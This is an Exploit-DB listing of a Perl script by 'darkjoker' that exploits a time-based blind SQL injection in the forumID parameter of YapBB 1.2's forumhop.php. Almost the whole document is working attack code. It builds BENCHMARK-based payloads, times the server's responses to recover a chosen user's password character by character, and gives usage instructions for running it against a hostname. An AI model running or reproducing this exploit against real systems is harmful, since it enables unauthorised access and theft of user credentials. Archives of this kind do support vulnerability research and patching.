YapBB 1.2 - 'forumID' Blind SQL Injection

EDB-ID:

7984




Platform:

PHP

Date:

2009-02-04


--+++======================================================+++--
--+++====== YapBB <= 1.2 Blind SQL Injection Exploit ======+++--
--+++======================================================+++--

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

sub usage
{
	die "\nYapBB <= 1.2 Blind SQL Injection Exploit".
	    "\n[?] Author  : darkjoker".
	    "\n[?] Site    : http://darkjoker.net23.net".
	    "\n[?] CMS Site: http://yapbb.sourceforge.net/".
	    "\n[?] Usage   : perl ${0} <hostname> <path> <username> [<key_list>]".
	    "\n[?] Ex.     : perl ${0} localhost /YapBB root abcdefghijklmnopqrstuvwxyz".
	    "\n\n";
}

sub query
{
	my ($user, $chr, $pos) = @_;
	my $query = "123 OR IF ((ASCII(SUBSTRING((SELECT password FROM ".
	"forum_user WHERE nickname = '${user}'),${pos},1))=${chr}),BENCHMARK(200000000,CHAR(0)),0)";
	$query =~ s/ /%20/g;
	$query =~ s/'/%27/g;
	return $query;
}

sub exploit
{
	my ($hostname, $path, $user, $chr, $pos) = @_;
	$chr = ord ($chr);
	my $sock = new IO::Socket::INET (
						PeerHost => $hostname,
						PeerPort => 80,
						Proto    => "tcp"
					) or die "\n[!] Exploit failed.\n\n";

	my $query = query ($user, $chr, $pos);
	my $request = "GET ${path}/forumhop.php?action=next&forumID=${query} HTTP/1.1\r\n".
		      "Host: ${hostname}\r\n".
		      "Connection: Close\r\n\r\n";
	
	my $a = time ();
	print $sock $request;
	$_++ while (<$sock>);
	$a = ($a - time ()) * -1;
	close ($sock);

	return 1 if ($a > 4);
	return 0;
}
		
my ($hostname, $path, $user, $k_list) = @ARGV;
usage unless ($user);
my @key = split ("", ($k_list) ? $k_list : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789");
my $chr = 0;
my $pos = 1;
my $password;
while ($chr < scalar (@key))
{
	if (exploit ($hostname, $path, $user, $key [$chr], $pos))
	{
		$password .= $key [$chr];
		$chr = 0;
		$pos++;
	}
	else
	{
		$chr++;
	}
}

print "\n[+] Password: ${password}\n\n";

# milw0rm.com [2009-02-04]